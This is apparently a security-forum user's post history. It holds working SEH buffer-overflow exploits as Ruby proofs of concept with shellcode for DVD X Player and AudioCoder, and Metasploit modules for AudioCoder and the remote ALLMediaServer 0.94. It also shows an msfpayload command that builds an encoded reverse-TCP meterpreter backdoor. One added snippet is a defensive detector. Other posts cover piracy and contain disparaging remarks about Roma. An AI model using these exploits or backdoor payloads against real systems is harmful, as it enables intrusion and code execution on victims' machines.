Posts: 879
Joined
Last visited
Days Won: 24
Everything posted by neox
-
#!/usr/bin/env ruby
# Exploit Title: DVD X Player 5.5.3.7 Pro & Standard (SEH) Buffer Overflow
# Download link: http://www.aviosoft.com/dvd-player.html
# RST
# Author: metacom
# Date (found): 03.05.2013
# Date (publish): 03.05.2013
# version: 5.5.3.7 Pro & Standard
# Category: poc
# Tested on: windows 7 German
# Notes: Last Update DVD X Player Jan 28, 2012
# SOLUTION: None

# calc.exe shellcode
calc = "\xba\x38\xdc\x15\x77\xdd\xc7\xd9\x74\x24\xf4\x5d\x33\xc9" +
"\xb1\x33\x83\xc5\x04\x31\x55\x0e\x03\x6d\xd2\xf7\x82\x71" +
"\x02\x7e\x6c\x89\xd3\xe1\xe4\x6c\xe2\x33\x92\xe5\x57\x84" +
"\xd0\xab\x5b\x6f\xb4\x5f\xef\x1d\x11\x50\x58\xab\x47\x5f" +
"\x59\x1d\x48\x33\x99\x3f\x34\x49\xce\x9f\x05\x82\x03\xe1" +
"\x42\xfe\xec\xb3\x1b\x75\x5e\x24\x2f\xcb\x63\x45\xff\x40" +
"\xdb\x3d\x7a\x96\xa8\xf7\x85\xc6\x01\x83\xce\xfe\x2a\xcb" +
"\xee\xff\xff\x0f\xd2\xb6\x74\xfb\xa0\x49\x5d\x35\x48\x78" +
"\xa1\x9a\x77\xb5\x2c\xe2\xb0\x71\xcf\x91\xca\x82\x72\xa2" +
"\x08\xf9\xa8\x27\x8d\x59\x3a\x9f\x75\x58\xef\x46\xfd\x56" +
"\x44\x0c\x59\x7a\x5b\xc1\xd1\x86\xd0\xe4\x35\x0f\xa2\xc2" +
"\x91\x54\x70\x6a\x83\x30\xd7\x93\xd3\x9c\x88\x31\x9f\x0e" +
"\xdc\x40\xc2\x44\x23\xc0\x78\x21\x23\xda\x82\x01\x4c\xeb" +
"\x09\xce\x0b\xf4\xdb\xab\xe4\xbe\x46\x9d\x6c\x67\x13\x9c" +
"\xf0\x98\xc9\xe2\x0c\x1b\xf8\x9a\xea\x03\x89\x9f\xb7\x83" +
"\x61\xed\xa8\x61\x86\x42\xc8\xa3\xe5\x05\x5a\x2f\xc4\xa0" +
"\xda\xca\x18"

junk = "\x41" * 601          # Junk bytes
nseh = "\xEB\x06\x90\x90"    # Short (6 bytes) jump!
seh  = "\xB8\x22\x30\x60"    # 0x603022B8 5E POP ESI from Configuration.dll
nops = "\x90" * 50
head = "http://"
data = head + junk + nseh + seh + nops + calc

# Write the playlist file that triggers the overflow
File.open("crash.plf", 'w') do |b|
  b.write data
  puts "file size : " + data.length.to_s
end
-
Well then, why does he go off the rails at the end of the tutorial, after complicating things with all the nonsense he does, when you could make a simple backdoor payload (for example make a copy of calc and overwrite the one in Windows), and likewise when Windows restarts it loads with Windows, and with multi/handler you control the connection, but you solve nothing because it is local. You don't understand one thing: when you use multi/handler from Metasploit you have no way of controlling the external IP; to do something like that you need at least 10 more steps that are missing from the tutorial. I don't want to argue or contradict each other, but the idea is neither new nor complete, and the bad chars thing, as I told you here, proves that he doesn't know what he is talking about in the tutorial; if you don't believe me, look on Wikipedia too at the bad chars "x00\x0a\x0d" to see what they are for. Newline - Wikipedia, the free encyclopedia

From the original article:

root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b "x00\x0a\x0d" -c 3 x > /var/www/data.bin
[*] x86/shikata_ga_nai succeded with size 342 (iteration=1)
[*] x86/shikata_ga_nai succeded with size 369 (iteration=2)
[*] x86/shikata_ga_nai succeded with size 396 (iteration=3)

Where: LHOST=192.168.1.10 - the IP address of the server that initiates the listening mechanism; LPORT=4444 - the listening port; -e x86/shikata_ga_nai - the type of encoder used; -c 3 - 3 encoding loops; data.bin - the payload (backdoor). The next step consists of creating and initialising a server meant to launch a mechanism for listening for connection requests from the clients (victims). For this we will open a Kali Linux console and invoke <msfcli> as follows

and the explanation of -b "x00\x0a\x0d": nothing. So when I saw this, it made me realise there's no point reading any further and getting shaken up like a Pepsi; try the tutorial yourself and see what happens. We're already going off topic; many of you on RST work with Metasploit, what do you say?
What can I say about my grammar mistakes, that's how it is, what can I do.
-
Come on man, there's no way it works remotely; he puts an internal IP in the payload and that only works locally; for an external IP it has to be controlled.

root@kali:~# msfvenom -h
Usage: /opt/metasploit/msf3/msfvenom [options]
Options:
    -p, --payload    [payload]       Payload to use. Specify a '-' or stdin to use custom payloads
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled    [length]        Prepend a nopsled of [length] size on to the payload
    -f, --format     [format]        Format to output results in: raw, ruby, rb, perl, pl, bash, sh, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch       [architecture]  The architecture to use
        --platform   [platform]      The platform of the payload
    -s, --space      [length]        The maximum size of the resulting payload
    -b, --bad-chars                  The list of characters to avoid example: '\x00\xff'   !!!!!! LOOK HERE, I'M NOT TALKING NONSENSE
    -i, --iterations [count]         The number of times to encode the payload
    -c, --add-code   [path]          Specify an additional win32 shellcode file to include
    -x, --template   [path]          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -h, --help

If I didn't know, I wouldn't get involved, so I'm not talking rubbish; msfvenom -h gives you everything there is: -b, --bad-chars The list of characters to avoid example: '\x00\xff'
-
I don't even think the method works, from what I've seen in the source code, and even if it did work, something like that only works locally; for it to work remotely more needs to be done, such as controlling the IP, for instance with No-IP. And what cracked me up is this command:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b "x00\x0a\x0d" -c 3 x > /var/www/data.bin

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 - correct, meterpreter with the IP
LPORT=4444 R - correct, the port
msfencode -e x86/shikata_ga_nai -t - correct, encoding the payload
raw -a x86 - correct, raw output, 32-bit architecture
but here it is a mess: -b "x00\x0a\x0d" - incorrect; you only use something like that in exploit development, it means remove the byte array of bad characters (bad characters from a binary code). For example, the characters \x0a and \x0d are usually marked as bad because they are Line Feed (LF) and Carriage Return (CR); \x00 is zero and that's why you take it out. And I wonder what something like that is doing in a backdoor-type payload. And from here on there's no point for me to try or bother my head with this topic.
-
Metasploit exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
  #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AudioCoder Buffer Overflow Exploit (SEH)',
      'Description'    => %q{
          This module exploits a vulnerability found in AudioCoder 0.8.18 filename handling routine.
          When supplying a string of input data embedded in a .m3u file, if this input data is long
          enough, it can cause a stack-based buffer overflow, which may lead to arbitrary code
          execution under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom27[at]gmail.com', # Original discovery
          'metacom',                # MSF Module
          'RST',
        ],
      'References'     =>
        [
          [ 'OSVDB', '<insert OSVDB number here>' ],
          [ 'CVE', 'insert CVE number here' ],
          [ 'URL', '<insert another link to the exploit/advisory here>' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process', #none/process/thread/seh
          #'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'    => "\x00\x0a\x0d", # <change if needed>
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'Windows 7', # Tested on: Windows 7 SP1/SP0
            {
              'Ret'    => 0x660104EE, #libiconv-2.dll
              'Offset' => 765
            }
          ],
        ],
      'Privileged'     => false,
      #Correct Date Format: "M D Y"
      #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
      'DisclosureDate' => 'May 01 2013',
      'DefaultTarget'  => 0))

    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'audiocoder.m3u']),], self.class)
  end

  def exploit
    buffer = "http://"
    buffer << rand_text_alpha_upper(target['Offset']) #junk
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded #2824 bytes of space
    buffer << rand_text_alpha(5000-buffer.length) # more junk may be needed to trigger the exception

    print_status("Creating '#{datastore['FILENAME']}'...")
    file_create(buffer)
  end
end

direct-exploit

#!/usr/bin/env ruby
# Exploit Title: AudioCoder 0.8.18 Buffer Overflow Exploit (SEH)
# Download link: http://www.mediacoderhq.com/getfile.htm?site=dl.mediacoderhq.com&file=AudioCoder-0.8.18.exe
# Vulnerable Product: AudioCoder
# Date (found): 30.04.2013
# Date (publish): 01.05.2013
# RST
# Author: metacom
# Version: version 0.8.18
# Category: poc
# Tested on: windows 7 German

begin
  #calc
  shellcode = "\x89\xe0\xdb\xc8\xd9\x70\xf4\x5b\x53\x59\x49\x49\x49\x49" +
  "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +
  "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +
  "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +
  "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" +
  "\x58\x4d\x59\x53\x30\x55\x50\x53\x30\x43\x50\x4d\x59\x5a" +
  "\x45\x56\x51\x58\x52\x52\x44\x4c\x4b\x50\x52\x56\x50\x4c" +
  "\x4b\x50\x52\x54\x4c\x4c\x4b\x31\x42\x45\x44\x4c\x4b\x34" +
  "\x32\x31\x38\x44\x4f\x4f\x47\x51\x5a\x37\x56\x30\x31\x4b" +
  "\x4f\x50\x31\x49\x50\x4e\x4c\x57\x4c\x35\x31\x33\x4c\x53" +
  "\x32\x56\x4c\x37\x50\x49\x51\x38\x4f\x54\x4d\x35\x51\x49" +
  "\x57\x4d\x32\x5a\x50\x36\x32\x36\x37\x4c\x4b\x46\x32\x54" +
  "\x50\x4c\x4b\x47\x32\x37\x4c\x53\x31\x4e\x30\x4c\x4b\x47" +
  "\x30\x54\x38\x4b\x35\x49\x50\x42\x54\x51\x5a\x35\x51\x4e" +
  "\x30\x50\x50\x4c\x4b\x57\x38\x55\x48\x4c\x4b\x36\x38\x31" +
  "\x30\x45\x51\x59\x43\x4b\x53\x57\x4c\x30\x49\x4c\x4b\x30" +
  "\x34\x4c\x4b\x55\x51\x4e\x36\x30\x31\x4b\x4f\x50\x31\x49" +
  "\x50\x4e\x4c\x39\x51\x48\x4f\x34\x4d\x43\x31\x49\x57\x46" +
  "\x58\x4b\x50\x42\x55\x5a\x54\x43\x33\x43\x4d\x5a\x58\x37" +
  "\x4b\x33\x4d\x57\x54\x53\x45\x4a\x42\x30\x58\x4c\x4b\x56" +
  "\x38\x36\x44\x43\x31\x48\x53\x35\x36\x4c\x4b\x54\x4c\x30" +
  "\x4b\x4c\x4b\x56\x38\x45\x4c\x53\x31\x39\x43\x4c\x4b\x54" +
  "\x44\x4c\x4b\x35\x51\x4e\x30\x4b\x39\x51\x54\x31\x34\x37" +
  "\x54\x51\x4b\x51\x4b\x55\x31\x30\x59\x30\x5a\x46\x31\x4b" +
  "\x4f\x4d\x30\x31\x48\x51\x4f\x50\x5a\x4c\x4b\x42\x32\x4a" +
  "\x4b\x4b\x36\x51\x4d\x52\x4a\x43\x31\x4c\x4d\x4c\x45\x48" +
  "\x39\x55\x50\x55\x50\x53\x30\x50\x50\x43\x58\x36\x51\x4c" +
  "\x4b\x32\x4f\x4d\x57\x4b\x4f\x39\x45\x4f\x4b\x4c\x30\x48" +
  "\x35\x39\x32\x56\x36\x53\x58\x59\x36\x5a\x35\x4f\x4d\x4d" +
  "\x4d\x4b\x4f\x38\x55\x57\x4c\x35\x56\x33\x4c\x44\x4a\x4b" +
  "\x30\x4b\x4b\x4d\x30\x33\x45\x54\x45\x4f\x4b\x50\x47\x42" +
  "\x33\x33\x42\x42\x4f\x42\x4a\x43\x30\x31\x43\x4b\x4f\x59" +
  "\x45\x32\x43\x43\x51\x42\x4c\x33\x53\x36\x4e\x43\x55\x43" +
  "\x48\x55\x35\x43\x30\x41\x41"

  file = "fuzz.m3u"
  head = "http://"
  junk = "\x90" * 765          # Distance to overwrite EIP
  nseh = "\xEB\x06\x90\x90"    # Short (6 bytes) jump!
  seh  = "\xEE\x04\x01\x66"    # POP ECX / POP ECX / RETN from libiconv-2.dll
  nops = "\x90" * 80

  # Write the playlist file that triggers the overflow
  textfile = open(file, 'w')
  textfile.write(head + junk + nseh + seh + nops + shellcode)
  textfile.close()
  puts
  puts " Vulnerable file created!...\n"
end
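An added example, not code from the original posts: a defender-side checker in Ruby for the playlist files the two proofs of concept above write, which reports the SEH-overwrite layout (filler run, \xEB\x06 short jump, handler address) and flags the \x00, \x0a, \x0d bytes that a line-oriented parser truncates on, the reason they appear as BadChars and in the msfencode -b discussion above. The sample file, filler length and handler bytes are constructed from values on this page, with harmless ASCII standing in for shellcode.

```ruby
# Added example (not from the original posts): inspect .m3u/.plf playlist entries.
BAD_CHARS = "\x00\x0a\x0d".b.freeze   # NUL, LF, CR: end C strings / playlist lines
SHORT_JMP = "\xEB\x06".b.freeze        # jmp +6: nSEH hops over the handler address

# Longest run of one repeated byte in `data`: [byte, length, start_offset].
def longest_run(data)
  best = [nil, 0, 0]
  i = 0
  while i < data.bytesize
    j = i
    j += 1 while j < data.bytesize && data.getbyte(j) == data.getbyte(i)
    best = [data.getbyte(i), j - i, i] if j - i > best[1]
    i = j
  end
  best
end

# Bytes from BAD_CHARS that occur in `payload` (as integers, deduplicated).
def bad_chars_in(payload)
  payload.b.bytes.select { |b| BAD_CHARS.bytes.include?(b) }.uniq
end

# Split file content the way a line-based playlist parser would (CR/LF end an entry).
def playlist_entries(content)
  content.b.split(/\r\n|\n|\r/).reject(&:empty?)
end

# Describe one playlist entry: size, filler run, and the SEH layout if present.
def analyse_entry(entry)
  entry = entry.b
  byte, len, start = longest_run(entry)
  info = { length: entry.bytesize, filler_byte: byte, filler_run: len, seh_layout: false }
  jmp = start + len                      # a short jump right after the filler = nSEH
  if entry[jmp, 2] == SHORT_JMP && entry.bytesize >= jmp + 8
    info[:seh_layout] = true
    info[:seh_handler] = entry[jmp + 4, 4].unpack1("V")   # little-endian SEH address
    info[:payload_bad_chars] = bad_chars_in(entry[(jmp + 8)..-1])
  end
  info
end

# Constructed sample file: a benign entry, then one shaped like the .plf PoC above
# (601-byte filler, same handler bytes, ASCII text in place of shellcode).
SAMPLE_FILE = "http://example.com/song.mp3\n".b +
              "http://".b + ("A" * 601).b + SHORT_JMP + "\x90\x90".b +
              "\xB8\x22\x30\x60".b + ("\x90" * 8).b + "FAKE-PAYLOAD\n".b

if __FILE__ == $0
  playlist_entries(SAMPLE_FILE).each { |e| p analyse_entry(e) }
end
```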
-
Then well done, I didn't comment on anything.
-
If you can no longer log in, that doesn't mean you confirm the method. For example, I have a PayPal account and someone from my family tried to log in and got the password wrong several times; it immediately blocked the account. I couldn't log in anymore; I tried "forgot password" and it asked me the answer to the secret question; I did everything but it didn't work. I only sorted it out by phoning PayPal and faxing my ID, after which they unblocked it. So if I have your PayPal email ID and I try to log in a few times and get it wrong, it blocks it; that is a mechanism against brute force. And as Gecko says, how the hell do you do it with someone else's email address, who confirms the link you receive by email????? Besides that, even if it blocked the account (it isn't deleted, PayPal keeps it in their memory), it also blocked the EMAIL ID; try and see, if you want to make another account it says the email ID is used by someone else.
-
You can't manipulate it, we're talking about sacred things (I'm not saying it can't be done, everything is possible, but you'd have to be an expert ninja, so ordinary people have no chance). I have a Vodafone USB stick K3565-Z without a subscription, I top it up with 10€ and for 7 days I can do whatever I want online without a limit.
-
Move it to Penale, the trash can; I don't understand how a thoroughly lousy post even got 5 stars. Do you want to make a mockery of this category too? Aren't there enough blah-blah categories? This is the Exploits and POCs category.
-
Well done. But please also make a video demonstrating the XSS; you can use Camtasia Studio to mask the commands. It's not that I don't believe you, it's just the only way I can give you reputation.
-
You didn't say which wireless card or USB adapter you have?
-
I can't say I use Linux; I have Win7 installed, so only when I need BT5r3 and Kali Linux. BT5r3 is BT, you use it for many things: hacking, wireless etc... Kali is very strong, especially forensics (the investigation part). What I don't like about Kali are the following problems: errors aren't a problem, those get fixed, and as new versions of Kali appear it keeps getting better; what's annoying is that you can no longer navigate elegantly from the console, for example there is no longer a pentest folder, and more..... It's becoming more and more a distribution driven by mouse clicks, so navigating like in Windows, which I don't like; for the mouse I have Windows.
-
I don't think many know what 0day means; when you hear Java 0day, as Nytro says, you'd have to be blind to click on something like that.
-
Did any of you take part???
-
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
  #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ALLMediaServer 0.94 Buffer Overflow Exploit',
      'Description'    => %q{
          This module exploits a stack buffer overflow in ALLMediaServer 0.94.
          The vulnerability is caused due to a boundary error within the handling of HTTP requests.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom<metacom27[at]gmail.com>', # Original discovery
          '<metacom>',                       # MSF Module
          'RST',
        ],
      'References'     =>
        [
          [ 'OSVDB', '<insert OSVDB number here>' ],
          [ 'CVE', 'insert CVE number here' ],
          [ 'URL', 'http://www.bugsearch.net/en/14147/allmediaserver-094-seh-overflow-exploit.html' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process', #none/process/thread/seh
          #'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'    => "\x00", # <change if needed>
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'Windows 7', # Tested on: Windows 7 SP1/SP0
            {
              'Ret'    => 0x65EC24CA, # pop eax # pop ebx # ret - avcodec-53.dll
              'Offset' => 1065
            }
          ],
        ],
      'Privileged'     => false,
      #Correct Date Format: "M D Y"
      #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
      'DisclosureDate' => 'Mar 28 2013',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(888)], self.class)
  end

  def exploit
    connect

    buffer = "http://"
    buffer << rand_text(target['Offset']) #junk
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded #3931 bytes of space
    # more junk may be needed to trigger the exception

    print_status("Sending payload to ALLMediaServer on #{target.name}...")
    sock.put(buffer)

    handler
    disconnect
  end
end
-
Good grief, this is the last post, I won't waste my mind on ....... There is no "better" or "worse", only differences. These must be respected, whether it is about skin colour, way of life or an idea.
-
Another question, Mr. wirtz: what have you done for young people??? = prison. I live in Germany and, just like you, there are Nazis here too; you are people without a future, you blame everyone else but don't look at yourselves (it is easy to blame someone else for the situation you live in, but look in the mirror first). Most Gypsies live on money and state aid, but prison also costs money and is financed by the state (VAT from the people); how are you better than a Gypsy???? The difference is the colour; otherwise the Gypsy costs money and state aid, but so do you, through the years you say you spent in prison.
-
You'd have been better off staying in your lane with that introduction, peste; if I were admin I'd move it to Penale. I don't agree either with what most Gypsies in Romania do, but that's how it is: the way Gypsies are in Romania, that's how we are in Europe (the Mexicans of Europe). Let's get back to the subject: this is an IT forum, not one for racism or other nonsense. This is your introduction; what do you know in the IT category? What you wrote: how can you boast about something like that?
-
It depends on your point of view, how you see the forum: some learn and keep developing, others only deal with petty stuff, for example passwords, keyloggers, trojans; if you're looking for that you'll find plenty, use the search button. If you're looking for something serious, learn a programming language first, or start with something easy such as HTML and then see where to go next; look here for a start: HTML Certification, the tutorials are free.
-
Why do you want to take up hacking? What TV show did you watch? For stealing accounts and other nonsense nobody will help you; if you asked more seriously we'd help you a bit. PS: you got the wrong category, you should have posted in Help.
-
Nytro, I only asked to see how things stand; I noticed the exploits are just copied. For example, he sells a Firefox memory corruption exploit; what do you do with an exploit like that, it only crashes Firefox; that isn't an exploit, crashing is easy, the main thing is the back connection. I've noticed that exploit-db no longer has quality either; since I'm retired I have time and I've tested a lot; for the guys at Offensive it's enough if the exploit crashes and they mark it as verified and working. This page seems good to me because they verify and only put up the ones that work: Security Alert System - BugSearch.net
-
Here in Germany, since the laws became strict, detective firms have sprung up like mushrooms after rain, and for example GEMA signs a contract with them, or a singer or the music companies, and then they do this: they have some evidence, take it to a lawyer, and the lawyer files a request with T-Com (the provider) for the IP. As you say, wildchild, it's fine; for me, for example, only programs from Romania are of interest, films not at all, because I can't watch subtitled films after a lifetime of watching only directly dubbed films.
-
Has any of you bought exploits or sold exploits on the site 1337day.com??????
-
There are sites with online films in Germany, wildchild, but with old films it's rubbish, and the sites with new films are illegal even if the site in question says it's legal. kab00M!!, don't get into torrents in Germany, they have people directly employed who lie in wait all day; safer are files from rapidshare, upload.to etc., or more simply, torrents from Romania. If you live in Germany, get Sky or Telekom Entertain Pakete and you have everything you want, of course not programs and other stuff.